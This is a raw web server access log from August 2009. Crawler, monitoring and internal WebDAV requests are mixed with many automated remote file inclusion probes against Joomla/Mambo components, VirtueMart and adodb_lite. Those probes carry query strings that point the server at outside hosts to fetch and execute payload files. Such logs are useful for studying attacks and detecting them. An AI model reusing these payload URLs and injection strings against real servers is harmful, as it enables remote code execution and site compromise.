72.30.81.182 - - [05/Aug/2009:08:07:53 -0400] "GET /logs/access_log.Q109063000 HTTP/1.0" 200 5874408 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.182 - - [05/Aug/2009:08:09:38 -0400] "GET /logs/error_log.Q109072500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.70.114 - - [05/Aug/2009:08:09:45 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.30.81.182 - - [05/Aug/2009:08:08:33 -0400] "GET /logs/access_log.Q109072300 HTTP/1.0" 200 5083465 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.70.114 - - [05/Aug/2009:08:09:53 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:10:16 -0400] "GET //?path%5Bdocroot%5D=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:10:16 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 200 12411 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:10:16 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:10:17 -0400] "GET //?path%5Bdocroot%5D=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:10:17 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:10:17 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 200 12411 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:10:29 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:10:29 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.83.177 - - [05/Aug/2009:08:11:17 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://club-ate.com/lib/prototype/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.83.177 - - [05/Aug/2009:08:11:17 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://club-ate.com/lib/prototype/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
207.58.163.86 - - [05/Aug/2009:08:11:25 -0400] "GET /logs/access_log.Q109070400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://btz-computerservice.de/owa/templates_c/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
207.58.163.86 - - [05/Aug/2009:08:11:25 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://btz-computerservice.de/owa/templates_c/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
207.58.163.86 - - [05/Aug/2009:08:11:25 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://btz-computerservice.de/owa/templates_c/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
220.231.126.252 - - [05/Aug/2009:08:11:50 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://club-ate.com/lib/prototype/idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
220.231.126.252 - - [05/Aug/2009:08:11:50 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://club-ate.com/lib/prototype/idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
220.231.126.252 - - [05/Aug/2009:08:11:50 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://club-ate.com/lib/prototype/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.231.126.252 - - [05/Aug/2009:08:11:50 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://club-ate.com/lib/prototype/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:08:11:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.81.182 - - [05/Aug/2009:08:11:52 -0400] "GET /logs/access_log.Q109072700 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
172.16.1.180 - - [05/Aug/2009:08:11:54 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:11:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:11:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
59.22.140.17 - - [05/Aug/2009:08:11:57 -0400] "GET /logs/access_log.Q109070400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://btz-computerservice.de/owa/templates_c/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
59.22.140.17 - - [05/Aug/2009:08:11:57 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://btz-computerservice.de/owa/templates_c/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
59.22.140.17 - - [05/Aug/2009:08:11:57 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://btz-computerservice.de/owa/templates_c/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
141.223.5.12 - - [05/Aug/2009:08:12:09 -0400] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://yasmin.ws//blog/hardcore/idku.txt??? HTTP/1.1" 404 240 "-" "Microsoft Pocket Internet Explorer/0.6"
141.223.5.12 - - [05/Aug/2009:08:12:09 -0400] "GET //adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://yasmin.ws//blog/hardcore/idku.txt??? HTTP/1.1" 404 235 "-" "Microsoft Pocket Internet Explorer/0.6"
72.30.81.182 - - [05/Aug/2009:08:12:22 -0400] "GET /logs/access_log.Q109060500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.113.196.16 - - [05/Aug/2009:08:12:30 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:12:30 -0400] "GET /logs/access_log.Q109070300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:13:03 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:13:03 -0400] "GET /logs/access_log.Q109070300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
172.16.1.88 - - [05/Aug/2009:08:13:06 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:13:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:13:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:13:11 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:13:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:13:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
202.177.22.67 - - [05/Aug/2009:08:13:47 -0400] "GET /logs/access_log.Q109051900%20%20//shop/main.php?_shop_path=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
172.16.1.88 - - [05/Aug/2009:08:14:27 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:14:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:14:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
94.23.205.32 - - [05/Aug/2009:08:15:00 -0400] "GET //?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:08:15:00 -0400] "GET /logs/access_log.Q109070700//?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:08:15:00 -0400] "GET /logs//?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:08:15:20 -0400] "GET /logs/access_log.Q109071900//?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
209.59.12.99 - - [05/Aug/2009:08:16:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [05/Aug/2009:08:17:33 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
213.171.225.234 - - [05/Aug/2009:08:17:43 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id??? HTTP/1.1" 200 12406 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
213.171.225.234 - - [05/Aug/2009:08:17:43 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id??? HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
202.177.22.67 - - [05/Aug/2009:08:18:09 -0400] "GET /logs/access_log.Q109072900//shop/main.php?_shop_path=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.125.66.122 - - [05/Aug/2009:08:18:13 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.7.119 - - [05/Aug/2009:08:18:44 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
94.23.205.32 - - [05/Aug/2009:08:18:59 -0400] "GET /logs/access_log.Q109070200%20//?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
172.16.1.69 - - [05/Aug/2009:08:20:06 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:20:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:20:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
201.232.54.48 - - [05/Aug/2009:08:20:37 -0400] "GET /logs/access_log.Q109060300%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [05/Aug/2009:08:20:59 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:08:21:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.205.32 - - [05/Aug/2009:08:22:12 -0400] "GET //?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:08:22:12 -0400] "GET /logs/access_log.Q109060800//?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:08:22:12 -0400] "GET /logs//?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.803"
201.232.54.48 - - [05/Aug/2009:08:22:12 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.171.225.234 - - [05/Aug/2009:08:22:12 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id??? HTTP/1.1" 200 12406 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
213.171.225.234 - - [05/Aug/2009:08:22:13 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id??? HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
94.23.205.32 - - [05/Aug/2009:08:22:17 -0400] "GET /logs/access_log.Q109071900//?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
172.16.1.73 - - [05/Aug/2009:08:22:49 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.73 - - [05/Aug/2009:08:22:49 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.73 - - [05/Aug/2009:08:22:49 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:23:33 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:23:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:23:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.236.100.30 - - [05/Aug/2009:08:24:32 -0400] "GET /logs/error_log.Q109071000//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:24:33 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:24:33 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:24:33 -0400] "GET /logs/access_log.Q109071000//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:24:44 -0400] "GET /logs/error_log.Q109071000%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:24:45 -0400] "GET /logs/access_log.Q109071000%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
172.16.1.176 - - [05/Aug/2009:08:24:45 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:24:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:24:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.236.100.30 - - [05/Aug/2009:08:24:48 -0400] "GET /logs/error_log.Q109052700%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:24:48 -0400] "GET /logs/access_log.Q109052700%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:25:02 -0400] "GET /logs/error_log.Q109061000%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:25:06 -0400] "GET /logs/error_log.Q109062500%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:25:28 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:25:28 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:25:28 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:25:30 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:25:35 -0400] "GET /logs/access_log.Q109062200%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:25:44 -0400] "GET /logs/error_log.Q109060400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:25:49 -0400] "GET /logs/error_log.Q109060500%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:25:49 -0400] "GET /logs/access_log.Q109060300%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:25:57 -0400] "GET /logs/error_log.Q109062200%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:25:57 -0400] "GET /logs/error_log.Q109052800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:01 -0400] "GET /logs/access_log.Q109060500%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:01 -0400] "GET /logs/error_log.Q109060700%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:02 -0400] "GET /logs/access_log.Q109070400%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:02 -0400] "GET /logs/error_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:07 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:13 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:13 -0400] "GET /logs/error_log.Q109070400%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:35 -0400] "GET /logs/access_log.Q109061000%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:38 -0400] "GET /logs/error_log.Q109060300%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:38 -0400] "GET /logs/access_log.Q109062000%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:39 -0400] "GET /logs/error_log.Q109051700%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:45 -0400] "GET /logs/error_log.Q109062600%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:45 -0400] "GET /logs/access_log.Q109052800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:46 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:51 -0400] "GET /logs/access_log.Q109052700%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:26:51 -0400] "GET /logs/error_log.Q109052700%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
